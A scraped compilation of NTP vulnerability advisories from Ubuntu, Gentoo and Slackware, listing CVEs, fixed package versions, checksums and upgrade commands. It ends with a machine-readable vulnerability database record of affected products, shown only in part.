It was discovered that NTP incorrectly handled certain invalid mode configuration directives. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. (CVE-2017-6464)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 17.04: ntp 1:4.2.8p9+dfsg-2ubuntu1.1
Ubuntu 16.10: ntp 1:4.2.8p8+dfsg-1ubuntu2.1
Ubuntu 16.04 LTS: ntp 1:4.2.8p4+dfsg-3ubuntu5.5
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.11
In general, a standard system update will make all the necessary changes.
References: https://www.ubuntu.com/usn/usn-3349-1 CVE-2016-2519, CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7429, CVE-2016-7431, CVE-2016-7433, CVE-2016-7434, CVE-2016-9042, CVE-2016-9310, CVE-2016-9311, CVE-2017-6458, CVE-2017-6460, CVE-2017-6462, CVE-2017-6463, CVE-2017-6464
Package Information: https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p9+dfsg-2ubuntu1.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p8+dfsg-1ubuntu2.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.5 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.11
.
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] ntp (SSA:2016-120-01)
New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. This release patches several low and medium severity security issues: CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering CVE-2016-1549: Sybil vulnerability: ephemeral association attack, AKA: ntp-sybil - MITIGATION ONLY CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion botch CVE-2016-2517: Remote configuration trustedkey/requestkey values are not properly validated CVE-2016-2518: Crafted addpeer with hmode > 7 causes array wraparound with MATCH_ASSOC CVE-2016-2519: ctl_getitem() return value not always checked CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos CVE-2016-1548: Interleave-pivot - MITIGATION ONLY CVE-2015-7704: KoD fix: peer associations were broken by the fix for NtpBug2901, AKA: Symmetric active/passive mode is broken CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks CVE-2016-1550: Improve NTP security against buffer comparison timing attacks, authdecrypt-timing, AKA: authdecrypt-timing For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz
Slackware 13.1 package: dfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 63c4b31736040e7950361cd0d7081c8b ntp-4.2.8p7-x86_64-1_slack13.1.txz
Slackware 13.37 package: e760ae0c6cc3fa933e4d65d6995b0c84 ntp-4.2.8p7-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: aa448523b27bb4fcccc2f46cf4d72bc5 ntp-4.2.8p7-x86_64-1_slack13.37.txz
Slackware 14.0 package: 3bc7e54a4164a4f91be996b5cf2e643e ntp-4.2.8p7-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 0f6ea4dae476709f26f5d0e33378576c ntp-4.2.8p7-x86_64-1_slack14.0.txz
Slackware 14.1 package: dbe827ee7ece6ce5ca083cdd5960162c ntp-4.2.8p7-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 89f3edf183a6a9847d69b8349f98c901 ntp-4.2.8p7-x86_64-1_slack14.1.txz
Slackware -current package: 4018b86edd15e40e8c5e9f50d907dcff n/ntp-4.2.8p7-i586-1.txz
Slackware x86_64 -current package: 7dd6b64ba8c9fdaebb7becc1f5c3963d n/ntp-4.2.8p7-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p7-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. | +------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iEYEARECAAYFAlcjyyAACgkQakRjwEAQIjPtSgCdEB0YxCNSAabWZwD+ICyXcqeg 3rIAnRLKXh7P6QXP2t+va4PM0crnd3l4 =VO7T -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0396", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.9" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.13" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.12" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.8" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.6" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.4" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.14" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.11" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.7" }, { "model": "ntp", "scope": "eq", "trust": 1.6, "vendor": "ntp", "version": "4.3.10" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.3.90" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.36" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.71" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.56" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.65" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.51" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.48" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.81" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.63" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.16" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.91" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.74" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.80" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.50" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.87" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.62" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.54" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.21" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.78" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.73" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.5" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.27" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.49" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.89" }, { "model": "ntp", "scope": "lte", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.46" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.22" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.82" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.1" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.3" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.75" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.34" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.67" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.32" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.41" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.31" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.52" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.18" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.88" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.33" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.2" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.83" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.84" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.44" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.45" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.59" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.39" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.64" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.57" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.85" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.43" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.0" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.20" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.86" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.24" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.23" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.53" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.55" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.35" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.38" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.40" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.42" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.69" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.60" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.79" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.66" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.72" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.26" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.61" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.47" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.30" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.68" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.15" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.29" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.37" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.28" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.19" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.76" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.58" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.17" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.3.x" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.3.92" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "17.04" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "16.10" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "16.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7-rc2", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "wap371 wireless access point", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": 